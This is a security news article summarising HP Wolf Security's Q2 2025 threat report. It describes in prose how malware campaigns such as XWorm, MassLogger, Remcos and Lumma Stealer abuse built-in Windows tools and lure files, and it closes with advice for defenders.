Attackers are finding new ways to blend in with everyday business tools, hiding their activity inside formats and processes that workers and IT teams often trust. The latest quarterly Threat Insights Report from HP Wolf Security shows how attackers continue to adapt, making it harder for defenses to keep up.
Living off the land to stay hidden
One of the most notable campaigns observed in the Q2 of 2025 involved the XWorm remote access trojan. Instead of relying on custom malware alone, attackers chained together multiple built-in Windows tools. These so-called “living off the land” binaries allowed them to execute commands, copy files, and decode hidden payloads without triggering as many alerts.
XWorm configuration (Source: HP Wolf Security)
The final XWorm payload was concealed in the pixels of a legitimate image downloaded from a trusted website. PowerShell scripts extracted the hidden data, then MSBuild, a Microsoft tool, ran the malware. By the time the infection was complete, attackers had remote access and the ability to steal data, with much of the work carried out by programs already present on the system.
“Living off the land techniques are notoriously difficult for security teams because it’s hard to tell green flags from red – i.e. legitimate activity versus an attack. You’re stuck between a rock and a hard place – lock down activity and create friction for users and tickets for the SOC or leave it open and risk an attacker slipping through. Even the best detection will miss some threats, so defense-in-depth with containment and isolation is essential to trap attacks before they can cause harm,” said Dr. Ian Pratt, Global Head of Security for Personal Systems at HP Inc.
Invoices and fake documents still work
Phishing emails remain the dominant delivery method, accounting for 61% of threats that reached endpoints. Attackers continue to refine how they use document formats as lures.
One campaign used realistic invoice-themed emails to trick recipients into opening SVG attachments. The attachments displayed a convincing imitation of Adobe Acrobat, complete with animations and progress bars, before prompting users to download malware. The script that followed was a lightweight reverse shell, providing attackers with command execution and data collection.
Another wave of phishing leaned on PDF attachments that displayed blurred invoices with a download button. That link led to a malicious Visual Basic Encoded script hidden in a ZIP file. The script stored key parts of the malware directly in the Windows Registry, making detection even more difficult. The final payload was MassLogger, a credential stealer capable of capturing keystrokes and browser data. In some cases, if the victim was in France, attackers also deployed a secondary remote access trojan called ModiRAT.
Old file types resurface
The report also describes attackers repurposing formats that many users rarely see today. Compiled HTML Help files, once used for Windows application manuals, are now being weaponized to deliver malware. These files support scripting, making them containers for multi-stage infections. In observed campaigns, opening a help file disguised as project documentation triggered scripts that eventually led to XWorm infections.
Shortcut files (LNKs) also made a return. In one case, they were disguised as PDFs inside a ZIP archive delivered through a phishing email. Instead of opening a document, the shortcut executed malicious code that installed the Remcos remote access trojan. The attackers hid the final payload inside an old Program Information File format, further lowering the chance that users or tools would catch it.
Lumma Stealer survives takedown
Even law enforcement actions have not stopped some operators. Lumma Stealer was disrupted in May 2025 through an international takedown that seized much of its infrastructure. Yet campaigns distributing it continued in June, with attackers shifting to new servers and methods.
One delivery chain involved IMG archives attached to phishing emails. When opened, Windows treated these archives as virtual drives, presenting users with an HTML Application file disguised as an invoice. This eventually led to the execution of obfuscated PowerShell code that unpacked and ran Lumma Stealer in memory, bypassing disk-based detection.
Threat delivery trends
Archives were the top delivery method in Q2 2025, making up 40 percent of observed threats. Scripts and executables followed closely at 35 percent. Document formats such as Word, Excel, and PDF made up smaller but still significant portions.
The findings show how attackers continue to rotate through different file types, choosing the ones most likely to reach users without being flagged. Even older formats like .chm help files and PIF executables are finding new life in current campaigns.
What this means for defenders
The report shows that attackers are putting effort into blending in with legitimate activity. By hiding malware inside trusted file formats, leaning on built-in system tools, and using realistic lures, they reduce the chances of being caught early.
For defenders, this means looking beyond file signatures and basic filtering. Detection strategies that focus on behavior, persistence techniques, and misuse of system tools are becoming important.
The campaigns described here show that attackers do not need advanced malware when familiar tools and file types can be turned into weapons.
“Attackers aren’t reinventing the wheel, but they are refining their techniques. Living-off-the-land, reverse shells and phishing have been around for decades, but today’s threat actors are sharpening these methods. We’re seeing more chaining of living-off-the-land tools and use of less obvious file types, such as images, to evade detection. Take reverse shells as an example – you don’t have to drop a fully-fledged RAT when a simple, lightweight script will achieve the same effect. It’s simple, fast and often slips under the radar because it’s so basic,” noted Alex Holland, Principal Threat Researcher, HP Security Lab.
Source link
